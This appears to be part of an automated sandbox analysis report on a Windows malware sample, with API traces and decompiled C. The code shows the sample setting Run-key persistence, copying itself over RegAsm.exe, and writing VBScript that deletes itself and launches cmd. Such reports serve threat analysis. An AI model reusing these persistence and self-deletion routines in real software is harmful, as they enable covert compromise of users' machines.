                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2DF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000069), ref: 0040B300
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B309
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B312
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B31B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B327
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B333
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B33F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2E9
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B408
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B411
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B41D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B426
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B42F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B43B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B447
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B450
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B459
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B462
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B46B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B474
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@G@std@@$??1?$basic_string@$D@2@@std@@$G@2@@std@@$V?$basic_string@$Hstd@@$?c_str@?$basic_string@$G@2@@0@V10@0@$??0?$basic_string@$D@2@@0@$D@1@@File$G@1@@V10@V10@@$Delete$SleepV01@@rand$??8std@@CreateModuleNameV01@Y?$basic_string@srandtime
                                  • String ID: /stext "
                                  • API String ID: 1338134179-3856184850
                                  • Opcode ID: 1ce33ad10180f17a6c082a473abe56c480000efb03e1b482a5c4a1ccafc45b05
                                  • Instruction ID: be4b94b66ba9b0bd8820f021ae38252d46d58d745cb1822e142cef95b78b0ffe
                                  • Opcode Fuzzy Hash: 1ce33ad10180f17a6c082a473abe56c480000efb03e1b482a5c4a1ccafc45b05
                                  • Instruction Fuzzy Hash: 4D02EDB2C0050DEBDB05EBE0EC59EDE7B7CAF54345F04806AF516A3091EB745689CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407E37, Relevance: 142.1, APIs: 70, Strings: 11, Instructions: 326fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wcslen.MSVCRT ref: 00407E46
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 00407E64
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407EC2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                  • wcscmp.MSVCRT ref: 00407EE0
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407F1D
                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000), ref: 00407F25
                                  • wcslen.MSVCRT ref: 00407F40
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00415A24,?), ref: 00407F65
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415A24,?), ref: 00407F72
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F7D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F86
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F8F
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407FAB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407FB4
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407FBE
                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000), ref: 00407FC6
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 00407FD3
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407FE5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408010
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 0040801D
                                  • wcslen.MSVCRT ref: 00408022
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408034
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 0040803B
                                  • _wgetenv.MSVCRT ref: 0040804B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408056
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408061
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040806C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(WScript.Sleep 1000,?), ref: 0040807E
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject")), ref: 0040808C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,?,00415628,0041623C), ref: 004080B0
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ,?,00415628,00000000), ref: 004080C4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080CF
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004080DC
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080E9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080F6
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408102
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040810B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408114
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040811D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408126
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040812F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408138
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 0040814B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,0041BA28,00000000), ref: 00408163
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040816E
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040817B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408188
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408194
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040819D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081A6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081AF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081B8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081C1
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 004081CF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081DB
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004081E5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081F1
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040820F
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040821C
                                  • exit.MSVCRT ref: 00408228
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408231
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040823A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$G@2@@0@Hstd@@V?$basic_string@$?c_str@?$basic_string@$V01@V10@$??0?$basic_string@G@1@@$V01@@$??4?$basic_string@$FileY?$basic_string@$V10@0@wcslen$AttributesCopy$?length@?$basic_string@CreateDirectoryExecuteShell_wgetenvexitwcscmp
                                  • String ID: """, 0$6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                  • API String ID: 740851534-1710889521
                                  • Opcode ID: 25a4468c4bedb9d25f6c62a780da0af2a7d65bb534f9a9386c322f7da57d4325
                                  • Instruction ID: 2c5ee03a622c4f430e0af795343514bbf493609e2573cf328c1cc28c00924062
                                  • Opcode Fuzzy Hash: 25a4468c4bedb9d25f6c62a780da0af2a7d65bb534f9a9386c322f7da57d4325
                                  • Instruction Fuzzy Hash: 57C15D7290051DEBCB04AFE0EC49DEE7B3CFF54345B44802AF916A71A0EB789945CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004085AC, Relevance: 138.6, APIs: 63, Strings: 16, Instructions: 308registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 20%
                                  			E004085AC(char _a4) {
				signed int _v5;
				char _v6;
				char _v24;
				char _v40;
				char _v56;
				char _v72;
				char _v88;
				void* _v104;
				void* _v120;
				short _v640;
				void* _t63;
				char* _t65;
				WCHAR* _t68;
				char* _t69;
				char* _t71;
				char* _t74;
				char* _t75;
				char* _t76;
				char* _t77;
				signed int* _t79;
				char* _t80;
				char* _t81;
				signed int _t82;
				short* _t84;
				char* _t85;
				char* _t86;
				WCHAR* _t88;
				char* _t89;
				char* _t90;
				short* _t154;
				void* _t161;
				void* _t162;
				void* _t164;
				void* _t166;

				_t63 = E0040AC8C();
				if( *0x41b154 != 0x30) {
					_t63 = E00406D41(0x41b900);
				}
				if( *0x41c118 == 1) {
					_t63 = E0041050F(_t63);
				}
				if( *0x41b22a != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E00412BEE(_t63);
				}
				_t94 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				if( *0x41ba58 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t63);
					_t161 = _t161 + 0xc;
				}
				if( *0x41bc64 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E0040B9E8(0x80000002, _t94, _t63);
					_t161 = _t161 + 0xc;
				}
				if( *0x41ba20 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t63);
					_t161 = _t161 + 0xc;
				}
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t65 = E0040B692(0x80000001,  &_v640, "exepath",  &_v640, 0x208, _t63, _t63);
				_t162 = _t161 + 0x1c;
				if(_t65 == 0) {
					_t65 = GetModuleFileNameW(0,  &_v640, 0x208);
				}
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				RegDeleteKeyA(0x80000001, _t65);
				_v5 = 1;
				_t68 = SetFileAttributesW( &_v640, 0x80);
				if(_t68 == 0) {
					_v5 = _v5 & _t68;
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t68 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					SetFileAttributesW(_t68, 0x80);
				}
				_t69 =  &_v6;
				__imp___wgetenv(L"Temp", _t69, L"\\update.vbs");
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t69);
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t69);
				_t71 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t71);
				L0041416A();
				_t164 = _t162 + 0x18;
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v40, L"On Error Resume Next\n", _t71);
				if(_v5 != 0) {
					_t88 =  &_v640;
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t88,  &_v6, L"\")\n");
					_t89 =  &_v72;
					L0041416A();
					_t90 =  &_v24;
					L00414146();
					_t164 = _t164 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t90, _t90, _t89, _t89, L"while fso.FileExists(\"", _t88);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t154 = L"\"\n";
				_t74 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t74,  &_v640, _t154);
				_t75 =  &_v72;
				L00414146();
				_t76 =  &_v56;
				L00414146();
				_t166 = _t164 + 0x18;
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t76, _t76, _t75, _t75, _t74);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v5 != 0) {
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t76 != 0) {
					_t85 =  &_v72;
					L0041416A();
					_t86 =  &_v56;
					L00414146();
					_t166 = _t166 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t86, _t86, _t85, _t85, L"fso.DeleteFolder \"", 0x41bc68, _t154);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t77 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t77, "\n");
				_t79 =  &_v5;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t79,  &_a4, _t77);
				_t80 =  &_v24;
				L0041414C();
				_t81 =  &_v72;
				L0041414C();
				_t82 =  &_v56;
				L00414146();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t82, _t82, _t81, _t81, _t80, _t80, _t79);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t84 = E00412D56( &_v40, _t82 << 1, _t82 << 1, _t82, 0);
				if(_t84 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t84 = ShellExecuteW(0, L"open", _t84, 0x415800, 0x415800, 0);
					if(_t84 > 0x20) {
						exit(0);
					}
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t84;
			}





































                                  0x004085b5
                                  0x004085c1
                                  0x004085c8
                                  0x004085c8
                                  0x004085d4
                                  0x004085d6
                                  0x004085d6
                                  0x004085e2
                                  0x004085e9
                                  0x004085f0
                                  0x004085f5
                                  0x00408605
                                  0x0040860f
                                  0x00408613
                                  0x0040861c
                                  0x00408621
                                  0x00408621
                                  0x0040862b
                                  0x0040862f
                                  0x0040863c
                                  0x00408641
                                  0x00408641
                                  0x0040864b
                                  0x0040864f
                                  0x00408660
                                  0x00408665
                                  0x00408665
                                  0x0040866f
                                  0x00408678
                                  0x00408698
                                  0x004086a0
                                  0x004086a5
                                  0x004086aa
                                  0x004086b6
                                  0x004086b6
                                  0x004086be
                                  0x004086c6
                                  0x004086df
                                  0x004086e3
                                  0x004086e7
                                  0x004086e9
                                  0x004086e9
                                  0x004086f7
                                  0x00408701
                                  0x00408709
                                  0x00408710
                                  0x00408710
                                  0x00408712
                                  0x00408720
                                  0x0040872b
                                  0x00408736
                                  0x00408741
                                  0x00408747
                                  0x00408753
                                  0x00408763
                                  0x00408768
                                  0x0040876e
                                  0x00408778
                                  0x00408783
                                  0x0040878d
                                  0x00408794
                                  0x0040879d
                                  0x004087a6
                                  0x004087aa
                                  0x004087af
                                  0x004087b6
                                  0x004087bf
                                  0x004087c8
                                  0x004087d1
                                  0x004087d1
                                  0x004087d7
                                  0x004087e4
                                  0x004087f0
                                  0x004087f7
                                  0x004087fb
                                  0x00408804
                                  0x00408808
                                  0x0040880d
                                  0x00408814
                                  0x0040881d
                                  0x00408826
                                  0x0040882f
                                  0x00408839
                                  0x00408843
                                  0x00408843
                                  0x00408850
                                  0x0040885a
                                  0x0040885e
                                  0x00408867
                                  0x00408870
                                  0x00408874
                                  0x00408879
                                  0x00408880
                                  0x00408889
                                  0x00408892
                                  0x00408892
                                  0x00408898
                                  0x004088a9
                                  0x004088b4
                                  0x004088c0
                                  0x004088c7
                                  0x004088cb
                                  0x004088d4
                                  0x004088d8
                                  0x004088e1
                                  0x004088e5
                                  0x004088f1
                                  0x004088fa
                                  0x00408903
                                  0x0040890c
                                  0x00408915
                                  0x0040891e
                                  0x0040892c
                                  0x00408938
                                  0x00408942
                                  0x0040894e
                                  0x00408955
                                  0x0040895f
                                  0x00408967
                                  0x00408974
                                  0x0040897d
                                  0x00408980
                                  0x00408980
                                  0x0040897d
                                  0x00408989
                                  0x00408992
                                  0x0040899b
                                  0x004089a5

                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004085E9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 00408613
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040862F
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040864F
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040866F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00408678
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 00408698
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 004086B6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004086BE
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 004086C6
